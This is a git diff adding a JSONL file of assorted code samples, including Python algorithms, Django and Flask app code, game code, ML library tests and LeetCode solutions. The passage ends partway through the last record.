diff --git "a/2940.jsonl" "b/2940.jsonl" new file mode 100644--- /dev/null +++ "b/2940.jsonl" @@ -0,0 +1,584 @@ +{"seq_id":"391653692","text":"from collections import deque\nimport sys\nsys.stdin=open(\"00.txt\")\n\nMAX = 200000\ncheck = [False] *(MAX+1)\ndist = [-1] * (MAX+1)\nn,m = map(int,input().split())\ncheck[n] = True\ndist[n] = 0\n\nq= deque()\nq.append(n)\n\nwhile q:\n now = q.popleft()\n for nxt in [now-1,now+1,now*2]:\n if 0<= nxt <= MAX and check[nxt] == False:\n check[nxt] = True\n dist[nxt] = dist[now] +1\n q.append(nxt)\n\nprint(dist[m])\n","sub_path":"BFS/1/1697번 - 숨바꼭질/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"574886207","text":"import math\n\n\nh = 0.01\nN = 1000\n\ndef y(y1, y0=1):\n yhead = [y0, y1]\n for i in range(N):\n yhead.append(yhead[-2] + 2*h*(-2*yhead[-1] + 1))\n return yhead\n\n\nyf = list(enumerate(y((1-2*h+math.sqrt(4*(h**2)+1))/2)))\nys = list(enumerate(y((math.exp(-2*h)+1)/2)))\nprint(\"With y1 =(1-2h+sqrt(4h^2+1))/2 : \" + str(yf))\nprint(\"With y1 =(exp(-2*h)+1)/2 : \" + str(ys))\n","sub_path":"10.8.8.Kulyashov.py","file_name":"10.8.8.Kulyashov.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"19212937","text":"from SinglyLinkedList import SinglyLinkedList\n\nclass Queue(object):\n \"\"\"docstring for Queue\"\"\"\n lstInstance = SinglyLinkedList()\n def dequeue(self):\n return self.lstInstance.removeAt(0)\n def enqueue(self, value):\n self.lstInstance.insertAt(value, self.lstInstance.getSize())\n \nif __name__ == '__main__':\n queue = Queue()\n queue.enqueue('a')\n queue.enqueue('b')\n queue.enqueue('c')\n\n print(queue.dequeue())\n print(queue.dequeue())\n print(queue.dequeue())\n","sub_path":"Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"578883234","text":"import os\n\nclass Node:\n\n def __init__(self, name: str, typenode: str, coord: list, addr: list, status: str, desc=None):\n self.stat = [\"down\", \"down\", \"down\"]\n self.name = name\n self.type = typenode\n self.coord = coord\n self.addr = addr\n self.status = status\n self.desc = desc\n\n def ping(self, ip):\n ping = f\"ping -c 3 {ip} > /dev/null\"\n return os.system(ping)\n\n def stats(self):\n self.stat = []\n for ip in self.addr:\n if self.ping(ip) == 0:\n self.stat.append(\"up\")\n else:\n self.stat.append(\"down\")\n\n def check_status(self):\n if \"down\" in self.stat:\n self.status = \"offline\"\n else:\n self.status = \"online\"\n\n\n\n def take_screenshot(self):\n if self.type == \"cam\":\n pass\n\n\n\n\n\nvk01 = Node(\"vk01\", \"cam\", ['43.581482', '39.722635'], ['31.173.192.49', '10.10.20.101', '172.30.100.254'], \"online\")\n\n\n","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"106094821","text":"import datetime\nimport re\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.sites import models as sites_models\n\nfrom armstrong.apps.articles import models as article_models\nfrom armstrong.core.arm_sections import models as section_models\nfrom armstrong.core.arm_wells import models as well_models\n\n# Need to convert:\n#\n# 1. Sections\n# 2. News\n# 3. Users\nfrom madisonian import models as mad_models\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n self.slug_ctr = 0\n self.clear_tables()\n self.convert_sections()\n self.convert_articles()\n self.add_well()\n\n def convert_sections(self):\n for section in mad_models.Sections.objects.all().order_by('priority'):\n slug = self.slugify(section.section)\n section_models.Section.objects.create(title=section.section, slug=slug)\n\n def convert_articles(self):\n for news in mad_models.News.objects.filter(issue_date__gt=datetime.date(2011,12,31)):\n slug = re.sub(r\"\\W\", \"\", news.caption.lower())\n if not slug:\n slug = self.junk_slug()\n try:\n article_models.Article.objects.get(slug=slug)\n slug = self.junk_slug()\n except article_models.Article.DoesNotExist:\n pass\n pub_date = datetime.datetime.strptime(\"%s 00:00:00\" % news.issue_date, \"%Y-%m-%d %H:%M:%S\")\n article = article_models.Article(title=news.caption,\n slug=slug[:50],\n summary=news.preview,\n body=news.full_story,\n pub_date=pub_date,\n pub_status='P',)\n article.save()\n article.sites.add(sites_models.Site.objects.all()[0])\n article.sections.add(section_models.Section.objects.get(full_slug=self.slugify(news.section)))\n article.save()\n\n\n def clear_tables(self):\n self.clear_sites()\n self.clear_sections()\n self.clear_articles()\n\n def clear_sites(self):\n site = sites_models.Site.objects.all()[0]\n site.domain='wintersetmadisonian.com'\n site.name='wintersetmadisonian.com'\n site.save()\n\n def clear_sections(self):\n section_models.Section.objects.all().delete()\n\n def clear_articles(self):\n article_models.Article.objects.all().delete()\n\n def slugify(self, words):\n return re.sub(r\"\\W\", \"\", words.lower())\n\n def junk_slug(self):\n self.slug_ctr += 1\n return str(self.slug_ctr)\n\n def add_well(self):\n type = well_models.WellType.objects.create(title='front_page', slug='front_page')\n well_models.Well.objects.create(pub_date=datetime.datetime.now(), type=type)","sub_path":"project/madisonian/management/commands/convert_madisonian.py","file_name":"convert_madisonian.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"230264108","text":"#!/bin/python3\n\nimport json\nimport logging\nimport os\nimport sys\nimport time\nimport copy\nimport random\nfrom logging.handlers import RotatingFileHandler\n\nfrom alexis_src.client_player import ClientPlayer\nfrom alexis_src.get_all_possible_plays import get_all_possible_plays\nfrom alexis_src.immutable_play import immutable_play\nfrom alexis_src.evaluate_game_state import predict_carlotta_move_inspector\n\nDEFAULT_HOST = \"localhost\"\nDEFAULT_PORT = 12000\n# HEADERSIZE = 10\n\n\"\"\"\nset up inspector logging\n\"\"\"\n# inspector_logger = logging.getLogger()\n# inspector_logger.setLevel(logging.DEBUG)\n# formatter = logging.Formatter(\n# \"%(asctime)s :: %(levelname)s :: %(message)s\", \"%H:%M:%S\")\n# # file\n# if os.path.exists(\"./logs/inspector.log\"):\n# os.remove(\"./logs/inspector.log\")\n# file_handler = RotatingFileHandler('./logs/inspector.log', 'a', 1000000, 1)\n# file_handler.setLevel(logging.DEBUG)\n# file_handler.setFormatter(formatter)\n# inspector_logger.addHandler(file_handler)\n# # stream\n# stream_handler = logging.StreamHandler()\n# stream_handler.setLevel(logging.WARNING)\n# inspector_logger.addHandler(stream_handler)\n\n\ndef get_best_play(game_state, plays):\n best_play = None\n min_carlotta_move = None\n best_game_state = None\n\n for play in plays:\n new_game_state = immutable_play(game_state, play)\n (scream, no_scream) = predict_carlotta_move_inspector(new_game_state)\n new_min_carlotta_move = abs(scream - no_scream)\n\n if best_play == None or new_min_carlotta_move < min_carlotta_move:\n best_play = play\n min_carlotta_move = new_min_carlotta_move\n best_game_state = new_game_state\n\n return (best_play, min_carlotta_move, best_game_state)\n\n\ndef immutable_play_rec2(question):\n plays = get_all_possible_plays(question)\n\n best_play = None\n min_carlotta_move = None\n for play in plays:\n new_game_state = immutable_play(question[\"game state\"], play)\n\n new_data = copy.deepcopy(question[\"data\"])\n new_data.pop(play[0])\n new_question = {\n \"question type\": question[\"question type\"],\n \"data\": new_data,\n \"game state\": new_game_state\n }\n\n plays2 = get_all_possible_plays(new_question)\n\n for play2 in plays2:\n new_game_state2 = immutable_play(new_game_state, play2)\n (scream, no_scream) = predict_carlotta_move_inspector(new_game_state2)\n new_min_carlotta_move = abs(scream - no_scream)\n\n if best_play == None or new_min_carlotta_move < min_carlotta_move:\n best_play = play + play2\n min_carlotta_move = new_min_carlotta_move\n\n return best_play\n\n\nclass SimpleMaxAI:\n def __init__(self):\n self.response_stack = []\n\n def get_next_play(self, question):\n if self.response_stack == []:\n if (question[\"game state\"][\"num_tour\"] - 1) % 2 == 1:\n self.response_stack = immutable_play_rec2(question)\n else:\n plays = get_all_possible_plays(question)\n (best_play, _, _) = get_best_play(question[\"game state\"], plays)\n\n self.response_stack = best_play\n\n if question[\"question type\"] == \"select character\":\n return self.response_stack.pop(0)\n else:\n return question[\"data\"].index(self.response_stack.pop(0))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 2:\n seed = float(sys.argv[1])\n else:\n seed = time.time()\n random.seed(seed)\n\n ai = SimpleMaxAI()\n p = ClientPlayer(DEFAULT_HOST, DEFAULT_PORT, ai)\n p.run()\n","sub_path":"alexis_inspector.py","file_name":"alexis_inspector.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"397610297","text":"def greedy_cow_transport(cows,limit):\n \"\"\"\n Uses a greedy heuristic to determine an allocation of cows that attempts to\n minimize the number of spaceship trips needed to transport all the cows. The\n returned allocation of cows may or may not be optimal.\n The greedy heuristic should follow the following method:\n\n 1. As long as the current trip can fit another cow, add the largest cow that will fit\n to the trip\n 2. Once the trip is full, begin a new trip to transport the remaining cows\n\n Does not mutate the given dictionary of cows.\n\n Parameters:\n cows - a dictionary of name (string), weight (int) pairs\n limit - weight limit of the spaceship (an int)\n \n Returns:\n A list of lists, with each inner list containing the names of cows\n transported on a particular trip and the overall list containing all the\n trips\n \"\"\"\n \n cowDict = cows\n sortedCowList = sorted(cowDict, key=cowDict.get, reverse=True)\n \n result = []\n \n while sortedCowList != []:\n trip = []\n tripCost = 0\n \n for cow in sortedCowList:\n if cowDict[cow] + tripCost <= limit:\n tripCost += cowDict[cow]\n trip.append(cow)\n \n result.append(trip)\n \n for cow in trip:\n sortedCowList.remove(cow) \n \n return result\n","sub_path":"Problem1/greedyCowTransport.py","file_name":"greedyCowTransport.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"332914945","text":"from sqlalchemy.sql.expression import func\nfrom flask import (Blueprint, flash, g, redirect, render_template, request, session, url_for)\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom base import db, Usuario\nfrom flask import session\nfrom base import *\nimport time\nimport datetime\n\nurlBuscarXEtiqueta = Blueprint('ControladorBuscarXEtiqueta', __name__, url_prefix='/ControladorBuscarXEtiqueta')\n\n@urlBuscarXEtiqueta.route('/buscar_etiqueta', methods=('GET', 'POST'))\ndef buscar_etiqueta():\n if request.method == 'POST':\n etiqueta = request.form['etiquetabuscar']\n user = session[\"user\"]\n recursosEnEtiqueta = []\n error = None\n if not etiqueta:\n error = 'Inserte etiqueta'\n if error is None:\n if db.session.query(Etiqueta.query.filter(Etiqueta.nombre == etiqueta).exists()).scalar():\n usuario = db.session.query(Usuario).filter(Usuario.username == user).one()\n etiqueta1 = db.session.query(Etiqueta).filter(Etiqueta.nombre == etiqueta).one()\n\n for categoria in usuario.categorias:\n for recurso in categoria.recursos:\n for etiqueta in recurso.recurso.etiquetas:\n if etiqueta.etiqueta.id_etiqueta == etiqueta1.id_etiqueta:\n recursosEnEtiqueta.append(recurso.recurso.recurso)\n return render_template('buscar_por_etiqueta.html', recursosBuscados=recursosEnEtiqueta)\n flash (error)\n return render_template ('buscar_por_etiqueta.html')\n\n\n","sub_path":"Project/Server/Server/flaskr/ControladorBuscarXEtiqueta.py","file_name":"ControladorBuscarXEtiqueta.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"446890832","text":"\"\"\"\r\nlinked list\r\n\"\"\"\r\nimport random\r\n\r\n\r\nclass Node:\r\n \"\"\"\r\n node class\r\n \"\"\"\r\n def __init__(self, val):\r\n self.val = val\r\n self.next = None\r\n\r\n def __str__(self):\r\n return str(self.val)\r\n\r\n def is_none(self):\r\n \"\"\"return True if .next is none\"\"\"\r\n return self.next is None\r\n\r\n\r\nclass LinkedList:\r\n \"\"\"\r\n Linked List\r\n \"\"\"\r\n @staticmethod\r\n def create_random_int_list(length=10):\r\n \"\"\"\r\n create a singly linked list with random integers\r\n \"\"\"\r\n nums = random.sample(range(0, length), length)\r\n print(nums)\r\n head = Node(nums[0])\r\n curr = head\r\n for num in nums[1:]:\r\n curr.next = Node(num)\r\n curr = curr.next\r\n return head\r\n\r\n @staticmethod\r\n def print_linkedlist(head):\r\n \"\"\"\r\n print each element of linked list (without loop detection)\r\n \"\"\"\r\n curr = head\r\n while curr is not None:\r\n print(curr.val, end=\" \")\r\n if curr.next is None:\r\n # print('here')\r\n break\r\n else:\r\n curr = curr.next\r\n print(\"\")\r\n\r\n\r\ndef main():\r\n \"\"\"main\"\"\"\r\n head = LinkedList.create_random_int_list(10)\r\n LinkedList.print_linkedlist(head)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"linked_list_loop_detection/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"304289578","text":"import random\nfrom pyglet import clock\nfrom lostcolony.pathfinding import HexGrid, HEX_HEIGHT, HEX_WIDTH\nfrom lostcolony.animation import load\n\n\nclass Effect:\n FILENAMES = ['effects/ricochet-%d.png' % i for i in range(1, 5)]\n\n images = None\n\n @classmethod\n def load_images(cls):\n if cls.images is not None:\n return\n\n cls.images = []\n for fname in cls.FILENAMES:\n im = load(fname)\n im.anchor_x = im.width // 2\n im.anchor_y = im.height\n cls.images.append(im)\n\n def __init__(self, world, pos):\n self.load_images()\n self.world = world\n self.pos = pos\n self.world.add_effect(self, pos)\n\n\nclass Ricochet(Effect):\n \"\"\"This is the ricochet effect for the autocannon.\"\"\"\n\n def __init__(self, world, pos, duration=0.5):\n super().__init__(world, pos)\n if duration is not None:\n clock.schedule_once(self.destroy, duration)\n\n def random_sprites(self, num=1):\n x, y = HexGrid.coord_to_world(self.pos)\n for _ in range(num):\n im = random.choice(self.images)\n dx = random.random() - 0.5\n dy = random.random() - 0.5\n c = x + dx, y + dy\n yield c, im\n\n def get_drawables(self):\n return self.random_sprites()\n\n def destroy(self, _):\n self.world.remove_effect(self, self.pos)\n\n\nclass ShotgunRicochet(Ricochet):\n def __init__(self, world, pos):\n super().__init__(world, pos, duration=0.3)\n self.drawables = list(self.random_sprites(5))\n\n def get_drawables(self):\n return self.drawables\n\n\nclass FlyingSprite(tuple):\n def blit(self, x, y, _):\n img, z = self\n img.blit(x, y + z, 0)\n\n\nclass BloodSpray(Effect):\n POINTS = [10, 5, 3, 2, 1]\n FILENAMES = ['effects/blood-%d.png' % p for p in POINTS]\n V = 2\n\n def __init__(self, world, pos, value, max_value=10):\n super().__init__(world, pos)\n self.create_particles(value, max_value)\n clock.schedule(self.update)\n\n def create_particles(self, value, max_value):\n self.particles = []\n for points, img in zip(self.POINTS, self.images):\n if points > max_value:\n continue\n num, value = divmod(value, points)\n\n x, y = HexGrid.coord_to_world(self.pos)\n for _ in range(num):\n v = self.V\n vx = random.uniform(-v, v)\n vy = random.uniform(-v, v)\n z = 30\n vz = random.uniform(60, 100)\n self.particles.append((x + vx * 0.5, y + vy * 0.5, z, vx, vy, vz, img))\n if not value:\n break\n\n def update(self, dt):\n ps = []\n for x, y, z, vx, vy, vz, img in self.particles:\n uz = vz\n vz -= 200 * dt\n z += 0.5 * (uz + vz) * dt\n if z < 0:\n continue\n x += vx * dt\n y += vy * dt\n ps.append((x, y, z, vx, vy, vz, img))\n self.particles = ps\n\n def get_drawables(self):\n for x, y, z, *_, img in self.particles:\n yield (x, y), FlyingSprite((img, z))\n","sub_path":"lostcolony/effects.py","file_name":"effects.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"42819692","text":"lst=[]\n\nn=int(input(\"Enter the size of the list :\"))\nprint(\"Enter the elemnts:\")\nfor i in range (0,n):\n ele=input()\n lst.append(ele)\nm= lst[n-1] \nlst[n-1] = -1\nfor i in range(n-2,-1,-1): \n temp = lst[i] \n lst[i]=m \n if m< temp: \n m=temp\nprint(\"The modified list is\",lst) \n \n","sub_path":"day_5/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"538850136","text":"def fibonacci(n):\n response = [0, 1, 1]\n if n == 0:\n return []\n elif n in [1, 2, 3]:\n return response[:n]\n else:\n for i in range(4, n + 1):\n response.append(response[i - 3] + response[i - 2])\n return response\n\n\nif __name__ == \"__main__\":\n print(list(map(lambda x: x**3, fibonacci(int(input())))))\n","sub_path":"pythonChallenges/easy/MapAndLambdaFunction.py","file_name":"MapAndLambdaFunction.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"413729661","text":"# -*- coding: utf8 -*-\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.forms import SelectMultiple\nfrom django.forms.fields import MultipleChoiceField\nfrom datetime import datetime\n\nfrom TripleMag.apps.member.models import user_basic\n\n##################################################################\n#Stock trade \n##################################################################\n\nclass selling_poll(models.Model):\n user_from = models.ForeignKey(user_basic,related_name=\"usr_from\",null=False,verbose_name='卖出者用户ID')\n amount = models.IntegerField(null=False,verbose_name='卖出数量')\n value = models.DecimalField(max_digits=10,decimal_places=4,null=False,verbose_name='单价')\n time = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='进入卖出池时间')\n user_to = models.ForeignKey(user_basic,related_name=\"usr_to\",null=True,verbose_name='定向卖给用户ID')\n #if user_to is null, then it's selled to everybody.\n #or only the user_to can see the selling\n #in the meanwhile the P2P selling have different setting of data\n #\n class Meta:\n verbose_name_plural =\"卖出池表\"\n\n##################################################################\n#Stock records \n##################################################################\n\nclass trade_record(models.Model):\n buyer = models.ForeignKey(user_basic,related_name=\"usr_buyer\",null=False,verbose_name='买股者ID')\n seller = models.ForeignKey(user_basic,related_name=\"usr_seller\",null=False,verbose_name='卖股者ID')\n amount = models.IntegerField(null=False,verbose_name='交易数量')\n value = models.DecimalField(max_digits=10,decimal_places=4,null=False,verbose_name='单价')\n time = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='成交时间')\n #What's following is info. for sellers\n tax = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='抽税')\n repo = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='回购')\n #Repo is the money that returns to his rebuy account to encourage him to buy more stock.\n ex_return = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='返给上级')\n #Return to the seller's recommender\n gain = models.DecimalField(max_digits=10,decimal_places=2,null=False,verbose_name='卖者最后所得')\n class Meta:\n verbose_name_plural =\"股票交易记录表\"\n\n\n\n#class flowing_stock(models.Model):\n# amont = models.BigIntegerField(null=False)\n# def __unicode__(self):\n# return self.name\n# class Meta:\n# verbose_name_plural =\"系统总股数\"\n\nEnumIncomeType= (\n (\"recharge\",\"自购充值\"),\n (\"gift\",\"商城购买赠送\"),\n (\"buy\",\"股票交易购买\"),\n)\nclass income_record(models.Model):\n to_user = models.ForeignKey(user_basic,related_name=\"usr_income\",null=True,verbose_name='得到股票用户ID')\n type = models.CharField(max_length=10,null=False,choices=EnumIncomeType,verbose_name='股票得到途径')\n amount = models.DecimalField(max_digits=10,decimal_places=4,null=False,blank=False,verbose_name='股票数额')\n time = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='股票到达时间')\n class Meta:\n verbose_name_plural =\"股票收入表\"\n\nclass trend_record(models.Model):\n value = models.DecimalField(max_digits=10,decimal_places=4,null=False,default=1.00,verbose_name='股票单价')\n day = models.DateTimeField(null=False,blank=True,auto_now=True,verbose_name='日期')\n class Meta:\n verbose_name_plural =\"趋势图表\"\n","sub_path":"TripleMag/apps/stock/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"146499373","text":"# coding=utf-8\n# Copyright 2019 The Edward2 Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Tests for Keras-style initializers.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport edward2 as ed\nimport numpy as np\nimport tensorflow.compat.v1 as tf1\nimport tensorflow.compat.v2 as tf\n\nfrom tensorflow.python.framework import test_util # pylint: disable=g-direct-tensorflow-import\n\n\n@test_util.run_all_in_graph_and_eager_modes\nclass InitializersTest(tf.test.TestCase):\n\n def testTrainableDeterministic(self):\n tf.random.set_seed(345689)\n shape = (100,)\n initializer = ed.initializers.get('trainable_deterministic')\n rv = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n # Get distribution of rv -> get distribution of Independent.\n loc_value = self.evaluate(rv.distribution.distribution.loc)\n atol = np.sqrt(6/sum(shape)) + 1e-8\n self.assertAllClose(loc_value, np.zeros(shape), atol=atol)\n\n rv_value = self.evaluate(rv)\n self.assertEqual(rv_value.shape, shape)\n\n def testTrainableHalfCauchy(self):\n tf.random.set_seed(2832)\n shape = (3,)\n initializer = ed.initializers.get('trainable_half_cauchy')\n half_cauchy = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n loc_value, scale_value = self.evaluate([\n # Get distribution of rv -> get distribution of Independent.\n half_cauchy.distribution.distribution.loc,\n half_cauchy.distribution.distribution.scale])\n self.assertAllClose(loc_value, np.zeros(shape), atol=1e-4)\n target_scale = np.log(1. + np.exp(-3.))\n self.assertAllClose(scale_value, target_scale * np.ones(shape), atol=5e-2)\n\n half_cauchy_value = self.evaluate(half_cauchy)\n self.assertAllEqual(half_cauchy_value.shape, shape)\n self.assertAllGreaterEqual(half_cauchy_value, 0.)\n\n def testTrainableNormal(self):\n tf.random.set_seed(345689)\n shape = (100,)\n initializer = ed.initializers.get('trainable_normal')\n normal = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n loc_value, scale_value = self.evaluate([\n # Get distribution of rv -> get distribution of Independent.\n normal.distribution.distribution.loc,\n normal.distribution.distribution.scale])\n self.assertAllClose(loc_value, np.zeros(shape), atol=1e-4)\n target_scale = np.log(1. + np.exp(-3.))\n self.assertAllClose(scale_value, target_scale * np.ones(shape), atol=5e-2)\n\n normal_value = self.evaluate(normal)\n self.assertEqual(normal_value.shape, shape)\n\n def testTrainableMixtureOfDeltas(self):\n tf.random.set_seed(345689)\n shape = (100,)\n num_components = 5\n initializer = ed.initializers.TrainableMixtureOfDeltas(num_components)\n mixture_shape = list(shape) + [num_components]\n rv = initializer(shape)\n self.evaluate(tf1.global_variables_initializer())\n probs_value, loc_value = self.evaluate([\n # Get distribution of rv -> get distribution of Independent.\n rv.distribution.distribution.mixture_distribution.probs,\n rv.distribution.distribution.components_distribution.loc,\n ])\n self.assertAllClose(\n probs_value,\n tf.broadcast_to([[1/num_components]*num_components], mixture_shape),\n atol=1e-4)\n self.assertAllClose(loc_value, np.zeros(mixture_shape), atol=1.)\n\n value = self.evaluate(rv)\n self.assertEqual(value.shape, shape)\n\n def testInitializersGet(self):\n self.assertIsInstance(ed.initializers.get('trainable_normal'),\n ed.initializers.TrainableNormal)\n # This is working correctly, but the test won't pass currently because TF\n # isn't consistent (yet). Specifically, tf.keras.initializers.get('zeros')\n # returns a certain class while tf.keras.initializers.zeros (or Zeros)\n # currently returns v2 of that class.\n # self.assertIsInstance(ed.initializers.get('zeros'),\n # tf.keras.initializers.Zeros().__class__)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","sub_path":"edward2/tensorflow/initializers_test.py","file_name":"initializers_test.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"646796066","text":"# https://leetcode.com/problems/sliding-window-median/description/\r\n\r\n\"\"\"\r\n[1,3,-1,-3,5,3,6,7]\r\n3\r\n[1,1,1,1]\r\n2\r\n[1,2,3,4,2,3,1,4,2]\r\n3\r\n[9,7,0,3,9,8,6,5,7,6]\r\n2\r\n\"\"\"\r\nimport heapq # Attempt1\r\nfrom collections import defaultdict\r\n\r\nimport bisect # Solution1\r\nimport itertools as it \r\n\r\nfrom heapq import heappush, heappop # Solution 2\r\n\r\nclass Solution(object): \r\n \r\n def medianSlidingWindow(self, nums, k):\r\n return self.attempt1(nums, k) # Getting too unwieldy, keep for reference but don't use\r\n # return self.solution1(nums, k) # 149 ms -> 94.49% (used binary search instead of remove())\r\n # return self.solution2(nums, k) # 286 ms -> 79.53%\r\n \r\n def attempt1(self, nums, k):\r\n \"\"\"\r\n Correctly implemented by Solutions 2/3. Improvements compared to mine:\r\n (1) no self.window; just keep track of the new number and the number that'll be deleted.\r\n (2) don't need to keep track of min_size and max_size (which always sum to k), just the overall \"balance\" \r\n (3) handle invalid tops (nums[i-k]) immediately, so you don't have to check before balancing (have to check subsequent top)\r\n ^ This is probably the error in my code\r\n \"\"\"\r\n res = [] \r\n self.hmin = [] # bigger half of window\r\n self.hmax = [] # smaller half of window\r\n self.window = defaultdict(int) # do not need {i: num}, since we can tell where a number is on the heap\r\n self.need_to_delete = defaultdict(int) \r\n self.min_size = self.max_size = 0 # stores true size of heap\r\n for i in xrange(k):\r\n self.add_num(nums[i])\r\n res.append(self.get_median())\r\n for i in xrange(k, len(nums)): \r\n if nums[i] not in self.window:\r\n self.delete_num(nums[i-k]) # nums[i-k] just went out of the window \r\n self.add_num(nums[i]) \r\n res.append(self.get_median())\r\n return res\r\n \r\n def delete_num(self, num):\r\n \"\"\"Problem: What if num is in both hmin and hmax? Then it must be on top of both, and we arbitrarily invalidate one for hmin.\"\"\"\r\n self.window[num] -= 1\r\n self.need_to_delete[num] += 1\r\n if self.hmin and num >= self.hmin[0]: # the num is on the min_heap\r\n self.min_size -= 1\r\n else:\r\n self.max_size -= 1\r\n # Used to do top validation in get_median, but need to make sure everything is balanced afterward, which relies on add_num\r\n top1 = self.hmin[0] if self.hmin else None \r\n while self.need_to_delete[top1]:\r\n heapq.heappop(self.hmin)\r\n self.need_to_delete[top1] -= 1\r\n top1 = self.hmin[0] if self.hmin else None \r\n top2 = -self.hmax[0] if self.hmax else None\r\n while self.need_to_delete[top2]:\r\n heapq.heappop(self.hmax)\r\n self.need_to_delete[top2] -= 1\r\n top2 = -self.hmax[0] if self.hmax else None\r\n \r\n def add_num(self, num): \r\n \"\"\"Since there's one delete for every add, abs(max_size - min_size) <= 2\r\n Issue: e.g. one 3 is in window, but multiple 3's stored in heap, then only 1 should be valid.\"\"\"\r\n self.window[num] += 1 \r\n if not self.hmin or num > self.hmin[0]: # no need for hmax clause, will be balanced later\r\n heapq.heappush(self.hmin, num)\r\n self.min_size += 1\r\n else: \r\n heapq.heappush(self.hmax, -num)\r\n self.max_size += 1\r\n while self.min_size - self.max_size > 1:\r\n temp = heapq.heappop(self.hmin)\r\n if self.need_to_delete[temp]: # temp could also be in self.window, technically (see issue above)\r\n self.need_to_delete[temp] -= 1\r\n elif self.window[temp]: \r\n heapq.heappush(self.hmax, -temp)\r\n self.max_size += 1\r\n self.min_size -= 1 \r\n while self.max_size - self.min_size > 1:\r\n temp = -heapq.heappop(self.hmax)\r\n if self.need_to_delete[temp]:\r\n self.need_to_delete[temp] -= 1\r\n elif self.window[temp]:\r\n heapq.heappush(self.hmin, temp)\r\n self.min_size += 1\r\n self.max_size -= 1 \r\n \r\n def get_median(self): # We can assume that k <= len(arr); delete_num -> valid tops, add_num -> balanced heaps\r\n # print [-i for i in reversed(self.hmax)], self.hmin\r\n # print self.max_size, self.min_size\r\n if self.min_size == self.max_size:\r\n return (self.hmin[0] - self.hmax[0]) / 2.0\r\n elif self.min_size > self.max_size:\r\n return self.hmin[0]\r\n else:\r\n return -self.hmax[0]\r\n \r\n # Similar to: https://discuss.leetcode.com/topic/74634/easy-python-o-nk\r\n # C++: https://discuss.leetcode.com/topic/74963/o-n-log-k-c-using-multiset-and-updating-middle-iterator\r\n def solution1(self, nums, k): # maintain sorted sliding window\r\n window = sorted(nums[:k])\r\n is_odd = k&1\r\n mid = k/2\r\n medians = []\r\n medians.append(float(window[mid]) if is_odd else (window[mid-1] + window[mid])/2.0)\r\n for i in xrange(k, len(nums)):\r\n del window[bisect.bisect_left(window, nums[i-k])] # Used to be 428 ms -> 59.06% w/ remove()\r\n bisect.insort(window, nums[i])\r\n medians.append(float(window[mid]) if is_odd else (window[mid-1] + window[mid])/2.0)\r\n return medians \r\n \r\n def solution2(self, nums, k): # Based off: https://discuss.leetcode.com/topic/74634/easy-python-o-nk/9\r\n medians = []\r\n hashes = defaultdict(int)\r\n bheap, theap = [], []\r\n for i in xrange(k):\r\n heappush(bheap, nums[i])\r\n for _ in xrange(k/2, 0, -1):\r\n heappush(theap, -heappop(bheap))\r\n medians.append(float(bheap[0]) if k&1 else (bheap[0] - theap[0]) / 2.0) \r\n for i in xrange(k, len(nums)): \r\n 